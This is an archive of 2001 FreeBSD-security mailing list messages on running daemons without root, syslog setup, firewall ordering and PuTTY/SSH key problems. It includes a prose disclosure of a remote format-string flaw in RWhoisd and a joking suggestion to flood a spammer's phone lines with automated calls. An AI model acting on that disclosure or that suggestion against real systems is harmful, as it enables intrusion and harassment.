I am interested in learning how to start up a program (a 3rd party server program, a daemon, whatever) automatically from boot up without using inetd and without using a root uid.

I do know that /usr/local/etc/rc.d/ (mostly from my ports downloads) will automatically run packages such as ssh and apache, and really anything you put in there. Unfortunately, these things initially run as root, so I'm skeptical about using it.

Are there any good, safe, secure ways to automatically start up third party services in really low privileged environments?

From owner-freebsd-security Wed Oct 24 23:44: 4 2001
Delivered-To: freebsd-security@freebsd.org
Received: from science.slc.edu (Science.SLC.Edu [198.83.6.248]) by hub.freebsd.org (Postfix) with ESMTP id 58E5A37B40A for ; Wed, 24 Oct 2001 23:43:53 -0700 (PDT)
Received: (from aschneid@localhost) by science.slc.edu (8.11.0/8.11.0) id f9P6gk202196; Thu, 25 Oct 2001 02:42:46 -0400 (EDT) (envelope-from aschneid)
Date: Thu, 25 Oct 2001 02:42:41 -0400
From: Anthony Schneider
To: Dave
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: lowering uids, startup
Message-ID: <20011025024241.A2163@mail.slc.edu>
References:
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: ; from mudman@R181172.resnet.ucsb.edu on Wed, Oct 24, 2001 at 11:36:16PM -0700
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

you may create a /usr/local/etc/rc.d/ script which simply has

su -c "command" user

in it, where user is the unprivileged user you want the program to run under, and command is a quote string of the full command and arguments. For example:

su -c "ls /root" nobody

will execute the command "ls /root" as user nobody.
This is a pretty lame example, because you wouldn't want it in a startup script, and because I don't think /root is permed against non-root users, but you see what I mean. :)
-Anthony.

On Wed, Oct 24, 2001 at 11:36:16PM -0700, Dave wrote:
>
> I am interested in learning how to start up a program (a 3rd party server
> program, a daemon, whatever) automatically from boot up without using
> inetd and without using a root uid.
>
> I do know that /usr/local/etc/rc.d/ (mostly from my ports downloads) will
> automatically run packages such as ssh and apache, and really anything you
> put in there. Unfortunately, these things initially run as root, so I'm
> skeptical about using it.
>
> Are there any good, safe, secure ways to automatically start up third
> party services in really low privileged environments?

From owner-freebsd-security Wed Oct 24 23:47:14 2001
Delivered-To: freebsd-security@freebsd.org
Received: from sbtx.tmn.ru (sbtx.tmn.ru [212.76.160.49]) by hub.freebsd.org (Postfix) with ESMTP id A53D637B401 for ; Wed, 24 Oct 2001 23:47:05 -0700 (PDT)
Received: from sv.tech.sibitex.tmn.ru (sv.tech.sibitex.tmn.ru [212.76.160.59]) by sbtx.tmn.ru (8.11.3/8.11.3) with ESMTP id f9P6l2k72039; Thu, 25 Oct 2001 12:47:03 +0600 (YEKST) (envelope-from serg@sbtx.tmn.ru)
Received: (from serg@localhost) by sv.tech.sibitex.tmn.ru (8.11.6/8.11.6) id f9P6l2p41975; Thu, 25 Oct 2001 12:47:02 +0600 (YEKST) (envelope-from serg)
Date: Thu, 25 Oct 2001 12:47:02 +0600
From: "Sergey N. Voronkov"
To: Dave
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: lowering uids, startup
Message-ID: <20011025124702.A41897@sv.tech.sibitex.tmn.ru>
References:
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: ; from mudman@R181172.resnet.ucsb.edu on Wed, Oct 24, 2001 at 11:36:16PM -0700
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Wed, Oct 24, 2001 at 11:36:16PM -0700, Dave wrote:
>
> I am interested in learning how to start up a program (a 3rd party server
> program, a daemon, whatever) automatically from boot up without using
> inetd and without using a root uid.

% man inetd.conf
[skip]
     the beginning of a line. There must be an entry for each field. The
     fields of the configuration file are as follows:

           service name
           socket type
           protocol
           {wait|nowait}[/max-child[/max-connections-per-ip-per-minute]]
           user[:group][/login-class]
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Exactly what do you need.
           server program
           server program arguments

> I do know that /usr/local/etc/rc.d/ (mostly from my ports downloads) will
> automatically run packages such as ssh and apache, and really anything you
> put in there. Unfortunately, these things initially run as root, so I'm
> skeptical about using it.

% man su
[skip]
     su [-] [-Kflm] [-c class] [login [args]]

DESCRIPTION
     Su requests the Kerberos password for login (or for `login.root'', if no
     login is provided), and switches to that user and group ID after
     obtaining a Kerberos ticket granting ticket. A shell is then executed.
     Su will resort to the local password file to find the password for login
     if there is a Kerberos error. If su is executed by root, no password is
     requested and a shell with the appropriate user ID is executed; no
     additional Kerberos tickets are obtained.
[skip]
     -l      Simulate a full login.
             The environment is discarded except for HOME, SHELL, PATH,
             TERM, and USER. HOME and SHELL are modified as above. USER
             is set to the target login. PATH is set to `/bin:/usr/bin''.
             TERM is imported from your current environment. Environment
             variables may be set or overridden from the login class
             capabilities database according to the class of the target
             login. The invoked shell is the target login's, and su will
             change directory to the target login's home directory.
             Resource limits and session priority are modified to that for
             the target account's login class.

     -       (no letter) The same as -l.

Example to your usage:

su - www telnetd -debug 2021

Good Luck!

Serg N. Voronkov,
Tyumen, Russia.

From owner-freebsd-security Wed Oct 24 23:53:22 2001
Delivered-To: freebsd-security@freebsd.org
Received: from oxmail.ox.ac.uk (oxmail4.ox.ac.uk [163.1.2.33]) by hub.freebsd.org (Postfix) with ESMTP id C5DBE37B40A for ; Wed, 24 Oct 2001 23:53:18 -0700 (PDT)
Received: from heraldgate2.oucs.ox.ac.uk ([163.1.2.50] helo=frontend2.herald.ox.ac.uk ident=exim) by oxmail.ox.ac.uk with esmtp (Exim 3.12 #1) id 15weO9-0006np-04; Thu, 25 Oct 2001 07:53:13 +0100
Received: from dhcp85.wadham.ox.ac.uk ([163.1.164.212] helo=piii600.wadham.ox.ac.uk) by frontend2.herald.ox.ac.uk with esmtp (Exim 3.32 #1) id 15weO9-0000GG-00; Thu, 25 Oct 2001 07:53:13 +0100
Reply-To: cperciva@sfu.ca
Message-Id: <5.0.2.1.1.20011025075053.00b1af50@popserver.sfu.ca>
X-Sender: cperciva@popserver.sfu.ca
X-Mailer: QUALCOMM Windows Eudora Version 5.0.2
Date: Thu, 25 Oct 2001 07:53:12 +0100
To: Dave ,
From: Colin Percival
Subject: Re: lowering uids, startup
In-Reply-To:
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

At 23:36 24/10/2001 -0700, Dave wrote:
>Are there any good, safe, secure ways to automatically start up third
>party services in really low privileged environments?

Use the @reboot time setting in the user's crontab(5) file.

Colin Percival

From owner-freebsd-security Thu Oct 25 0:31: 2 2001
Delivered-To: freebsd-security@freebsd.org
Received: from tngent02.tng.tmn.ru (ns.tng.tmn.ru [212.76.168.162]) by hub.freebsd.org (Postfix) with ESMTP id 4F2EB37B401 for ; Thu, 25 Oct 2001 00:30:57 -0700 (PDT)
Received: from tng.tmn.ru ([10.28.66.204]) by tngent02.tng.tmn.ru (8.11.6/8.11.6) with ESMTP id f9P7SZJ11011; Thu, 25 Oct 2001 13:28:36 +0600 (YEKST) (envelope-from igor@tng.tmn.ru)
Message-ID: <3BD7BEA3.8090607@tng.tmn.ru>
Date: Thu, 25 Oct 2001 13:26:27 +0600
From: "Igor I. Ushatinsky"
User-Agent: Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:0.9.4) Gecko/20011022
X-Accept-Language: ru, en-us
MIME-Version: 1.0
To: Anthony Schneider
Cc: Purwa Riadi , freebsd-security@FreeBSD.ORG
Subject: Re: telnet limitation
References: <20011023081729.A10955@warsaw.scl.ameslab.gov> <007c01c15c6b$5a861fc0$ab5b96ca@padjajaran> <000701c15c6c$5271d620$0900000a@web.cc> <00c601c15d13$8dd17200$ab5b96ca@padjajaran> <20011025011938.A1299@mail.slc.edu> <00dd01c15d1d$f5b55120$ab5b96ca@padjajaran> <20011025022646.A2029@mail.slc.edu>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Good day!

Anthony Schneider wrote:
> I'm not sure how to go about logging connections to telnetd.
> Perhaps someone else here knows.
Add this to your /etc/syslog.conf:

auth.*          /var/log/auth.log

Don't forget to touch the target file and send -HUP to syslogd :-)
Also you may want to add auth.log rotation to /etc/newsyslog.conf.

/Igor I. Ushatinsky,
Russia, Siberia, Tyumen.

From owner-freebsd-security Thu Oct 25 7:27:41 2001
Delivered-To: freebsd-security@freebsd.org
Received: from cow.net (ppp3-76.aquanet.co.il [192.117.247.76]) by hub.freebsd.org (Postfix) with ESMTP id 32B8337B401 for ; Thu, 25 Oct 2001 07:27:18 -0700 (PDT)
Received: from localhost (root@localhost) by cow.net (8.9.3/8.9.3) with ESMTP id TAA05048 for ; Thu, 25 Oct 2001 19:25:52 +0200
Date: Thu, 25 Oct 2001 19:25:51 +0200 (IST)
From: root
To: freebsd-security@freebsd.org
Subject: RWhoisd remote format string vulnerability
Message-ID:
MIME-Version: 1.0
Content-Type: MULTIPART/MIXED; BOUNDARY="8323328-1200701191-1004030751=:5027"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. Send mail to mime@docserver.cac.washington.edu for more info.

--8323328-1200701191-1004030751=:5027
Content-Type: TEXT/PLAIN; charset=US-ASCII

Hello,

There is a serious bug in RWhoisd by NSI on all versions. It is possible for a user to supply the format string passed to print_error() simply by using the "-soa" directive. The results are obvious, we can write almost anywhere in the proc's memory thus executing code as the user running rwhoisd.
(usually rwhoisd, but can easily become root if rwhoisd.conf writeable)

--8323328-1200701191-1004030751=:5027
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="gen.c"
Content-Transfer-Encoding: BASE64
Content-ID:
Content-Description:
Content-Disposition: attachment; filename="gen.c"

--8323328-1200701191-1004030751=:5027--

From owner-freebsd-security Thu Oct 25 8: 2:26 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mail.all.org (bdsl.66.12.117.154.gte.net [66.12.117.154]) by hub.freebsd.org (Postfix) with ESMTP id 5E5A237B406 for ; Thu, 25 Oct 2001 08:02:21 -0700 (PDT)
Message-ID: <3BD59381.1000500@all.org>
Date: Tue, 23 Oct 2001 11:57:53 -0400
From: "Steve Littleford"
MIME-Version: 1.0
To: security@freebsd.org
Subject: RE: Toner Cartridges
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Everyone,

I know spam is a fact of life, but these guys have a reputation for being jerks (or Toner weasels, if you prefer).
http://www.ecst.csuchico.edu/~atman/spam/

> **** VORTEX SUPPLIES ****

...

> ORDER BY PHONE:1-888-288-9043
> ORDER BY FAX: 1-888-977-1577
> E-MAIL REMOVAL LINE: 1-888-494-8597

Since this is a security list, could someone tell me what security problems I might run into if my FreeBSD machine were configured to call these 1-888 numbers continually? Aside from the hardware about two or three modems? Is it possible to assign this task to a non-root thread?
-Steve (gee, what do I do with these spare modems and Digi-Board?) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Oct 25 9: 4:45 2001 Delivered-To: freebsd-security@freebsd.org Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21]) by hub.freebsd.org (Postfix) with ESMTP id 2020F37B401 for ; Thu, 25 Oct 2001 09:04:40 -0700 (PDT) Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21]) by mohegan.mohawk.net (8.11.4/8.11.3) with ESMTP id f9PG4Qb39002; Thu, 25 Oct 2001 12:04:26 -0400 (EDT) Date: Thu, 25 Oct 2001 12:04:26 -0400 (EDT) From: Ralph Huntington To: Steve Littleford Cc: Subject: RE: Toner Cartridges In-Reply-To: <3BD59381.1000500@all.org> Message-ID: <20011025120404.E36395-100000@mohegan.mohawk.net> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This is NOT a security issue On Tue, 23 Oct 2001, Steve Littleford wrote: > Everyone, > > I know spam is a fact of life, but these guys have a reputation for > being jerks (or Toner weasels, if you prefer). > http://www.ecst.csuchico.edu/~atman/spam/ > > > > **** VORTEX SUPPLIES **** > > > ... > > > ORDER BY PHONE:1-888-288-9043 > > > ORDER BY FAX: 1-888-977-1577 > > E-MAIL REMOVAL LINE: 1-888-494-8597 > > > Since this is a security list, could someone tell me what security > problems I might run into if my FreeBSD machine were configured to call > these 1-888 numbers continually? Aside from the hardware about two or > three modems? Is it possible to assign this task to a non-root thread? > > > -Steve > > (gee, what do I do with these spare modems and Digi-Board?) 
> > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 26 0:17:13 2001 Delivered-To: freebsd-security@freebsd.org Received: from relay.pair.com (relay1.pair.com [209.68.1.20]) by hub.freebsd.org (Postfix) with SMTP id 6F3E637B408 for ; Fri, 26 Oct 2001 00:17:04 -0700 (PDT) Received: (qmail 20087 invoked from network); 26 Oct 2001 07:17:02 -0000 Received: from pec-124-149.tnt8.m2.uunet.de (HELO laptop) (149.225.124.149) by relay1.pair.com with SMTP; 26 Oct 2001 07:17:02 -0000 X-pair-Authenticated: 149.225.124.149 Message-ID: <006801c15dee$471d80c0$0901a8c0@system> From: "Tom Beer" To: Subject: Putty & SSH Date: Fri, 26 Oct 2001 09:16:24 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2615.200 X-MIMEOLE: Produced By Microsoft MimeOLE V5.00.2615.200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi, I try to connect from my M$ to a Freebsd Box using Putty via SSH. The keys were produced with the normal procedure under BSD. However, it is not possible to connect without entering a user name and password. This fails, cause I only want to connect via the ssh key and configured sshd in that way. The log on BSD reads as follows: Oct 25 14:18:14 strawberry sshd[158]: debug1: Forked child 15696. 
Oct 25 14:18:14 strawberry sshd[15696]: Connection from laptop.system port 1426 Oct 25 14:18:14 strawberry sshd[15696]: Connection from 192.168.1.9 port 1426 Oct 25 14:18:14 strawberry sshd[15696]: debug1: Client protocol version 2.0; client software version PuTTY Oct 25 14:18:14 strawberry sshd[15696]: debug1: no match: PuTTY Oct 25 14:18:14 strawberry sshd[15696]: Enabling compatibility mode for protocol 2.0 Oct 25 14:18:14 strawberry sshd[15696]: debug1: Local version string SSH-2.0-OpenSSH_2.3.0 green@FreeBSD.org 20010321 Oct 25 14:18:14 strawberry sshd[15696]: debug1: send KEXINIT Oct 25 14:18:14 strawberry sshd[15696]: debug1: done Oct 25 14:18:14 strawberry sshd[15696]: debug1: wait KEXINIT Oct 25 14:18:14 strawberry sshd[15696]: debug1: got kexinit: diffie-hellman-group1-sha1 Oct 25 14:18:14 strawberry sshd[15696]: debug1: got kexinit: ssh-dss Oct 25 14:18:14 strawberry sshd[15696]: debug1: got kexinit: 3des-cbc,blowfish-cbc,3des-cbc Oct 25 14:18:14 strawberry sshd[15696]: debug1: got kexinit: 3des-cbc,blowfish-cbc,3des-cbc Oct 25 14:18:14 strawberry sshd[15696]: debug1: got kexinit: hmac-sha1,hmac-md5,none Oct 25 14:18:14 strawberry sshd[15696]: debug1: got kexinit: hmac-sha1,hmac-md5,none Oct 25 14:18:14 strawberry sshd[15696]: debug1: got kexinit: none,zlib,none Oct 25 14:18:14 strawberry sshd[15696]: debug1: got kexinit: none,zlib,none Oct 25 14:18:14 strawberry sshd[15696]: debug1: got kexinit: Oct 25 14:18:14 strawberry sshd[15696]: debug1: got kexinit: Oct 25 14:18:14 strawberry sshd[15696]: debug1: first kex follow: 0 Oct 25 14:18:14 strawberry sshd[15696]: debug1: reserved: 0 Oct 25 14:18:14 strawberry sshd[15696]: debug1: done Oct 25 14:18:14 strawberry sshd[15696]: debug1: kex: client->server 3des-cbc hmac-sha1 none Oct 25 14:18:14 strawberry sshd[15696]: debug1: kex: server->client 3des-cbc hmac-sha1 none Oct 25 14:18:14 strawberry sshd[15696]: debug1: Wait SSH2_MSG_KEXDH_INIT. 
Oct 25 14:18:14 strawberry sshd[15696]: debug1: bits set: 521/1024 Oct 25 14:18:14 strawberry sshd[15696]: debug1: bits set: 497/1024 Oct 25 14:18:14 strawberry sshd[15696]: debug1: sig size 20 20 Oct 25 14:18:14 strawberry sshd[15696]: debug1: send SSH2_MSG_NEWKEYS. Oct 25 14:18:14 strawberry sshd[15696]: debug1: done: send SSH2_MSG_NEWKEYS. Oct 25 14:18:14 strawberry sshd[15696]: debug1: Wait SSH2_MSG_NEWKEYS. Oct 25 14:18:15 strawberry sshd[15696]: debug1: GOT SSH2_MSG_NEWKEYS. Oct 25 14:18:15 strawberry sshd[15696]: debug1: done: KEX2. Oct 25 14:18:17 strawberry sshd[15696]: fatal: Read from socket failed: Connection reset by peer Oct 25 14:18:17 strawberry sshd[15696]: debug1: Calling cleanup 0x805e72c(0x0) Any pointers would be highly appreciated Tom To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 26 0:24: 5 2001 Delivered-To: freebsd-security@freebsd.org Received: from internethelp.ru (wh.internethelp.ru [212.113.112.145]) by hub.freebsd.org (Postfix) with ESMTP id 5835337B403 for ; Fri, 26 Oct 2001 00:24:00 -0700 (PDT) Received: from IBMKA (ibmka.internethelp.ru. [192.168.0.6]) by internethelp.ru (8.9.3/8.9.3) with ESMTP id LAA08408 for ; Fri, 26 Oct 2001 11:23:58 +0400 (MSD) Date: Fri, 26 Oct 2001 11:23:59 +0400 From: "Nickolay A.Kritsky" X-Mailer: The Bat! (v1.49) Personal Reply-To: "Nickolay A.Kritsky" X-Priority: 3 (Normal) Message-ID: <1682052180.20011026112359@internethelp.ru> To: freebsd-security@freebsd.org Subject: ipfw and ipf on one box Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi all. Has anybody an experience of concurrent work of ipfw and ipfilter on one FreeBSD box? Is it possible? 
What will be the order of packets processing? If somebody knows an URL where this topic is (or may be) covered, this would be enough. Any help is very good. ;------------------------------------------- ; NKritsky ; SysAdmin InternetHelp.Ru ; http://www.internethelp.ru ; mailto:nkritsky@internethelp.ru To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 26 1:46:55 2001 Delivered-To: freebsd-security@freebsd.org Received: from relay2.agava.net.ru (ofc.agava.net [213.59.3.194]) by hub.freebsd.org (Postfix) with ESMTP id E70A537B401 for ; Fri, 26 Oct 2001 01:46:51 -0700 (PDT) Received: from hellbell.domain (hellbell.domain [192.168.1.12]) by relay2.agava.net.ru (Postfix) with ESMTP id 073FC66B5F; Fri, 26 Oct 2001 12:46:49 +0400 (MSD) Received: from localhost (localhost [127.0.0.1]) by hellbell.domain (Postfix) with ESMTP id 207DACCFC; Fri, 26 Oct 2001 12:46:35 +0400 (MSD) Date: Fri, 26 Oct 2001 12:46:35 +0400 (MSD) From: Alexei Zakirov X-X-Sender: To: "Nickolay A.Kritsky" Cc: Subject: Re: ipfw and ipf on one box In-Reply-To: <1682052180.20011026112359@internethelp.ru> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Fri, 26 Oct 2001, Nickolay A.Kritsky wrote: > Hi all. > > Has anybody an experience of concurrent work of ipfw and ipfilter on > one FreeBSD box? Is it possible? What will be the order of packets yes it's possible. I'm using this combination to get an in-kernel ipf NAT and ipfw working together. 
As I can see order is following: PKT -> (ipnat) -> (ipfilter) -> (ipfw) -> (bpf) -> INTERFACE OUT PKT <- (ipfw) <- (ipf) <- (ipnat) <- (bpf) <- INTERFACE IN *** WBR, Alexei Zakirov (frank@unshadow.net) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 26 2:58: 1 2001 Delivered-To: freebsd-security@freebsd.org Received: from internethelp.ru (wh.internethelp.ru [212.113.112.145]) by hub.freebsd.org (Postfix) with ESMTP id D7C7D37B401 for ; Fri, 26 Oct 2001 02:57:55 -0700 (PDT) Received: from IBMKA (ibmka.internethelp.ru. [192.168.0.6]) by internethelp.ru (8.9.3/8.9.3) with ESMTP id NAA09363; Fri, 26 Oct 2001 13:57:27 +0400 (MSD) Date: Fri, 26 Oct 2001 13:57:27 +0400 From: "Nickolay A.Kritsky" X-Mailer: The Bat! (v1.49) Personal Reply-To: "Nickolay A.Kritsky" X-Priority: 3 (Normal) Message-ID: <978337558.20011026135727@internethelp.ru> To: Alexei Zakirov Cc: freebsd-security@freebsd.org Subject: Re[2]: ipfw and ipf on one box In-reply-To: References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hello Alexei, Friday, October 26, 2001, 12:46:35 PM, you wrote: AZ> On Fri, 26 Oct 2001, Nickolay A.Kritsky wrote: >> Hi all. >> >> Has anybody an experience of concurrent work of ipfw and ipfilter on >> one FreeBSD box? Is it possible? What will be the order of packets AZ> yes it's possible. I'm using this combination to get an in-kernel ipf NAT AZ> and ipfw working together. AZ> As I can see order is following: PKT ->> (ipnat) -> (ipfilter) -> (ipfw) -> (bpf) -> INTERFACE OUT AZ> PKT <- (ipfw) <- (ipf) <- (ipnat) <- (bpf) <- INTERFACE IN AZ> *** WBR, Alexei Zakirov (frank@unshadow.net) Thanks a lot, I will try this on my firewall. 
;------------------------------------------- ; NKritsky ; SysAdmin InternetHelp.Ru ; http://www.internethelp.ru ; mailto:nkritsky@internethelp.ru To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 26 7:23:23 2001 Delivered-To: freebsd-security@freebsd.org Received: from SRDMAIL.SINP.MSU.RU (bigking.sinp.msu.ru [213.131.9.130]) by hub.freebsd.org (Postfix) with ESMTP id 45D5C37B405 for ; Fri, 26 Oct 2001 07:23:20 -0700 (PDT) Received: from [194.220.213.239] (helo=sinp.msu.ru) by SRDMAIL.SINP.MSU.RU with esmtp (Exim 3.33 #3) id 15x7wo-00095P-00 for freebsd-security@freebsd.org; Fri, 26 Oct 2001 18:26:58 +0400 Message-ID: <3BD971D3.4050605@sinp.msu.ru> Date: Fri, 26 Oct 2001 18:23:15 +0400 From: Dmitry Mottl Organization: SINP MSU User-Agent: Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:0.9.4) Gecko/20011004 X-Accept-Language: ru, en MIME-Version: 1.0 To: freebsd-security@freebsd.org Subject: Kerberos IV Content-Type: text/plain; charset=KOI8-R; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi I've just compiled and install the LAST (1.1) version of KerberosIV (kth-krb) from http://www.pdc.kth.se/kth-krb/ After installation I've noticed that shared library has number 2: libkrb.so.2 Why FreeBSD 4.4 ships with libkrb.so.3 ? Is the version of kth-krb in FreeBSD is not the same as the distribution from http://www.pdc.kth.se/kth-krb/ ? 
Thanks -- Best regards, Dmitry Mottl To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 26 7:44: 0 2001 Delivered-To: freebsd-security@freebsd.org Received: from sln.esc.edu (sln.esc.edu [138.116.200.3]) by hub.freebsd.org (Postfix) with ESMTP id B4BD337B405 for ; Fri, 26 Oct 2001 07:43:58 -0700 (PDT) To: "Tom Beer" Cc: security@FreeBSD.ORG Subject: Re: Putty & SSH X-Mailer: Lotus Notes Release 5.0.2c February 2, 2000 Message-ID: From: Bill.Melvin@esc.edu Date: Fri, 26 Oct 2001 10:39:52 -0400 X-MIMETrack: Serialize by Router on sln.esc.edu/SUNY(Release 5.0.2c |February 2, 2000) at 10/26/2001 10:42:38 AM, Serialize complete at 10/26/2001 10:42:38 AM MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > I try to connect from my M$ to a Freebsd Box using Putty via > SSH. The keys were produced with the normal procedure > under BSD ... user@fbsdbox $ ssh -V SSH Version OpenSSH_2.3.0 ... 
^^^^^^^ http://www.chiark.greenend.org.uk/~sgtatham/putty/faq.html#A.1.2 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 26 7:49: 8 2001 Delivered-To: freebsd-security@freebsd.org Received: from hotmail.com (oe50.law9.hotmail.com [64.4.8.22]) by hub.freebsd.org (Postfix) with ESMTP id 8FDD637B408 for ; Fri, 26 Oct 2001 07:49:03 -0700 (PDT) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Fri, 26 Oct 2001 07:49:03 -0700 X-Originating-IP: [194.185.80.200] From: "Andrea Di Giovanni" To: "Tom Beer" Cc: References: <006801c15dee$471d80c0$0901a8c0@system> Subject: Re: Putty & SSH Date: Fri, 26 Oct 2001 16:52:45 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="Windows-1252" Content-Transfer-Encoding: 8bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Message-ID: X-OriginalArrivalTime: 26 Oct 2001 14:49:03.0468 (UTC) FILETIME=[5AE682C0:01C15E2D] Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi Tom, I Know that putty has some problem with DSA key Are u trying to use such type of authentication? This will fail! And so u are prompted for password. u can use RSA key instead as suggested in putty home page. Regards, Andrea Di Giovanni ----- Original Message ----- From: "Tom Beer" To: Sent: venerdì 26 ottobre 2001 9.16 Subject: Putty & SSH > Hi, > > I try to connect from my M$ to a Freebsd Box using Putty via > SSH. The keys were produced with the normal procedure > under BSD. However, it is not possible to connect without entering > a user name and password. This fails, cause I only want to connect > via the ssh key and configured sshd in that way. 
The log on BSD reads as > follows: > > Oct 25 14:18:14 strawberry sshd[158]: debug1: Forked child 15696. > Oct 25 14:18:14 strawberry sshd[15696]: Connection from laptop.system port > 1426 > Oct 25 14:18:14 strawberry sshd[15696]: Connection from 192.168.1.9 port > 1426 > Oct 25 14:18:14 strawberry sshd[15696]: debug1: Client protocol version 2.0; > client software version PuTTY > Oct 25 14:18:14 strawberry sshd[15696]: debug1: no match: PuTTY > Oct 25 14:18:14 strawberry sshd[15696]: Enabling compatibility mode for > protocol 2.0 > Oct 25 14:18:14 strawberry sshd[15696]: debug1: Local version string > SSH-2.0-OpenSSH_2.3.0 green@FreeBSD.org 20010321 > Oct 25 14:18:14 strawberry sshd[15696]: debug1: send KEXINIT > Oct 25 14:18:14 strawberry sshd[15696]: debug1: done > Oct 25 14:18:14 strawberry sshd[15696]: debug1: wait KEXINIT > Oct 25 14:18:14 strawberry sshd[15696]: debug1: got kexinit: > diffie-hellman-group1-sha1 > Oct 25 14:18:14 strawberry sshd[15696]: debug1: got kexinit: ssh-dss > Oct 25 14:18:14 strawberry sshd[15696]: debug1: got kexinit: > 3des-cbc,blowfish-cbc,3des-cbc > Oct 25 14:18:14 strawberry sshd[15696]: debug1: got kexinit: > 3des-cbc,blowfish-cbc,3des-cbc > Oct 25 14:18:14 strawberry sshd[15696]: debug1: got kexinit: > hmac-sha1,hmac-md5,none > Oct 25 14:18:14 strawberry sshd[15696]: debug1: got kexinit: > hmac-sha1,hmac-md5,none > Oct 25 14:18:14 strawberry sshd[15696]: debug1: got kexinit: none,zlib,none > Oct 25 14:18:14 strawberry sshd[15696]: debug1: got kexinit: none,zlib,none > Oct 25 14:18:14 strawberry sshd[15696]: debug1: got kexinit: > Oct 25 14:18:14 strawberry sshd[15696]: debug1: got kexinit: > Oct 25 14:18:14 strawberry sshd[15696]: debug1: first kex follow: 0 > Oct 25 14:18:14 strawberry sshd[15696]: debug1: reserved: 0 > Oct 25 14:18:14 strawberry sshd[15696]: debug1: done > Oct 25 14:18:14 strawberry sshd[15696]: debug1: kex: client->server 3des-cbc > hmac-sha1 none > Oct 25 14:18:14 strawberry sshd[15696]: debug1: 